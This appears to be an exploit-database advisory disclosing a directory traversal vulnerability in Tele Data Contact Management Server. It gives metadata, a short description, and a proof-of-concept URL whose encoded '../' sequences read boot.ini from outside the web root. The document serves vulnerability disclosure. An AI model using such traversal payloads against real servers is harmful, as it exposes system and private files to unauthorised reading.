Tele Data Contact Management Server - Directory Traversal
Author: AutoSec Tools
type: webapps
platform: windows
port:
date_added: 2011-06-10
date_updated: 2011-06-10
verified: 1
codes: OSVDB-72972
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comTD_CMS_SETUPEX.exe
------------------------------------------------------------------------
Software................Tele Data Contact Management Server
Vulnerability...........Directory Traversal
Threat Level............Serious (3/5)
Download................http://teledata.qc.ca/td_cms/
Discovery Date..........6/1/2011
Tested On...............Windows XP SP3 EN
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
--Description--
A directory traversal vulnerability in Tele Data Contact Management
Server can be exploited to read files outside of the web root.
--PoC--
http://localhost/%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../boot.ini